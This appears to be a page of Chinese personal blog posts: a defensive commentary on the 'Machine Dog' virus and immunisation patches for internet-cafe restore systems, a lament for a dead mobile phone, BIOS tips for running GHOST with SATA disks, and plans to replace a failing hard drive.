重点是，一个病毒，如果以hook方式入侵系统，接替硬盘驱动的方式效率太低了，而且毁坏还原的方式这也不是最好的，还有就是这种技术应用范围非常小，只有还原技术厂商范围内有传播，在这方面国际上也只有中国在用，所以，很可能就是行业内杠。

对于网吧而言，机器狗就是剑指网吧而来，针对所有的还原产品设计，可预见其破坏力很快会超过熊猫烧香。好在现在很多免疫补丁都以出现，发稿之日起，各大杀毒软件都以能查杀。

免疫补丁之争
现在的免疫补丁之数是疫苗形式，以无害的样本复制到drivers下，欺骗病毒以为本身以运行，起到阻止危害的目的。这种形式的问题是，有些用户为了自身安全会在机器上运行一些查毒程序（比如QQ医生之类）。这样疫苗就会被误认为是病毒，又要废很多口舌。

解决之道
最新的解决方案是将system32/drivers目录单独分配给一个用户，而不赋予administror修改的权限。虽然这样能解决，但以后安装驱动就是一件头疼的事了。

最新动向
好像机器狗的开发以停止了，从样本放出到现在也没有新的版本被发现，这到让我们非常担心，因为虽着研究的深入，现在防御的手段都是针对病毒工作原理的，一但机器狗开始更新，稍加改变工作原理就能大面积逃脱普遍的防御手段，看来机器狗的爆发只是在等待，而不是大家可以高枕了。

今早七时许，习惯在厕所看新闻早报的我，一如既往的打开了早报，几页之后，手机便没有了任何反应，一如以前的没有在意这个常见的现象，但在几分钟后发现，会自动重起的手机，仍就死死的停在那里，感觉到了一丝不妙，扣电池，装电池，开机，没有反应，换电池重试，依旧视同我的不存在。

到单位后，接好充电器再试，问题依旧。反复试机无数．．．．．．．

无奈之下郑重宣布：大S寿终正寝！享年三年零六个月。

为跟随我出生入死，历经磨难的爱机默哀三分钟！

大Ｓ是跟随我时间最长的一部手机，是标准的终极而安，虽然早在一个月前就已经出现了一些征兆，但我却也一直不肯相信她会这么狠心的离我而去．还以为它能陪伴我度过２００７年的冬天．

回忆着她跟随我的那些岁月里，我无数次的折腾她，无数次的碰撞她，无数次的修正她，而只送给过她两块组装电池，一块原装电池（还是倒买倒卖赚的），还有赠送的一套粗糙衣服，她基本是都是毫无怨言的，虽然偶尔来点小脾气，但通常是很快的向我承认错误．但期间她为我发挥的作用却是不可估量的；接打重要电话无数，联系了诸多重要业务；娱乐无数，陪伴了我的休闲时间，学习无数，充实了我的部分休息时间．

爱机走了，肯定会有新的爱机补充上来，但她在我心里所占据的位置是永远无法改变的．

最后，在这里征集下补充力量的所需条件，排名不分先后：
１、智能手写；
２、大品牌；
３、待机时间在３天以上；
４、支持卡扩充；
５、屏幕不能进灰；
以上为必须条件，以下为可选。
６、支持３Ｇ标准；
７、做工精细；
８、最好是三防手机；

感觉条件是不是有点太完美了？？？就这么多吧！

有问题的硬盘里面全是我平时积攒下来的好看电影,只盼望还能拷贝出来!准备买硬盘喽!!!

1、 一个SATA硬盘挂在SATA1接口，一个CDROM挂在PRIMARY IDE接口（设为主盘）：　　　a) 开机进入BIOS设定，在MAIN菜单中选中IDE Configuration 　　　b) 将Onboard IDE Operate Mode改为Compatible Mode 　　　c) 在[Enhanced Mode Support On]中选择[Primary P-ATA+S-ATA] 　　　d) 重启进入BIOS后，你会发现在MAIN菜单中只有4个IDE设备了，[Primary IDE MASTER]为[CDROM]，[Primary IDE Slave]为[NONE]，[Secondary IDE Master]为[IDE DISK]（你的硬盘的型号），[[Secondary IDE Slave]为[NONE] 　　　e) 用光盘启动进入DOS后，运行GHOST就可以了

2、 一个SATA硬盘挂在SATA1接口，一个CDROM挂在SECONDARY IDE接口：只要将上面第三步中的[Primary P-ATA+S-ATA]改为[Secondary P-ATA+S-ATA]，就可以了，此时系统会将SATA1和SATA2设备当作[Primary IDE Master]和[Primary IDE Slave]。

3、 如果你使用了支持SATA的主板，但没有使用SATA设备时，有些主板BIOS还是默认打开了SATA通道的，此时要使用GHOST来备份系统也会导致黑屏，所以我们也需要在BIOS里面设置一下，来屏蔽掉SATA通道，还是在第一种情况下的第三步中，将[Primary P-ATA+S-ATA]改为[P-ATA Ports Only]，此时系统将屏蔽掉SATA设备，你可以将它做为普通的没有SATA设备的主板使用了。

想必是有块硬盘的该休息了，还是应该先买块大的硬盘替换下有问题的来才对，否则里面的东西会有找不回来的可能性。现在的串口盘做的越来越轻了，也薄了，因为我的主板支持串口的硬盘，所以我的目标就是２５０Ｇ的大硬盘，哈哈。强呀·